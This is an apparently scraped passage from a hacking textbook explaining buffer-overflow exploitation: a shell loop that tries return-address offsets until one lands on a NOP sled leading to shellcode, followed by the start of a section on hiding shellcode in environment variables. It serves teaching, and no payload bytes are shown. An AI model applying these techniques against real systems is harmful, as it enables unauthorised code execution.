Graphics Programs Reference
In-Depth Information
The function of the for loop should be familiar, even if the syntax is a
little different. The shell variable
$i
iterates through all the values found in
the grave accents (generated by
seq
). Then everything between the
do
and
done
keywords is executed. This can be used to quickly test many different
offsets. Since the NOP sled is 60 bytes long, and we can return anywhere on
the sled, there is about 60 bytes of wiggle room. We can safely increment the
offset loop with a step of 30 with no danger of missing the sled.
reader@hacking:~/booksrc $ for i in $(seq 0 30 300)
> do
> echo Trying offset $i
> ./a.out $i
> done
Trying offset 0
[DEBUG] found a 34 byte note for user id 999
[DEBUG] found a 41 byte note for user id 999
When the right offset is used, the return address is overwritten with a
value that points somewhere on the NOP sled. When execution tries to return
to that location, it will just slide down the NOP sled into the injected shellcode
instructions. This is how the default offset value was discovered.
0x331
Using the Environment
Sometimes a buffer will be too small to hold even shellcode. Fortunately, there
are other locations in memory where shellcode can be stashed. Environment
variables are used by the user shell for a variety of things, but what they are
used for isn't as important as the fact they are located on the stack and can
be set from the shell. The example below sets an environment variable called
MYVAR
to the string
test
. This environment variable can be accessed by prepend-
ing a dollar sign to its name. In addition, the
env
command will show all the
environment variables. Notice there are several default environment vari-
ables already set.
reader@hacking:~/booksrc $ export MYVAR=test
reader@hacking:~/booksrc $ echo $MYVAR
test
reader@hacking:~/booksrc $ env
SSH_AGENT_PID=7531
SHELL=/bin/bash
DESKTOP_STARTUP_ID=
TERM=xterm
GTK_RC_FILES=/etc/gtk/gtkrc:/home/reader/.gtkrc-1.2-gnome2
WINDOWID=39845969
OLDPWD=/home/reader
USER=reader
LS_COLORS=no=00:fi=00:di=01;34:ln=01;36:pi=40;33:so=01;35:do=01;35:bd=40;33;01:cd=40;33;01:or=4
0;31;01:su=37;41:sg=30;43:tw=30;42:ow=34;42:st=37;44:ex=01;32:*.tar=01;31:*.tgz=01;31:*.arj=01;
31:*.taz=01;31:*.lzh=01;31:*.zip=01;31:*.z=01;31:*.Z=01;31:*.gz=01;31:*.bz2=01;31:*.deb=01;31:*
.rpm=01;31:*.jar=01;31:*.jpg=01;35:*.jpeg=01;35:*.gif=01;35:*.bmp=01;35:*.pbm=01;35:*.pgm=01;35
:*.ppm=01;35:*.tga=01;35:*.xbm=01;35:*.xpm=01;35:*.tif=01;35:*.tiff=01;35:*.png=01;35:*.mov=01;
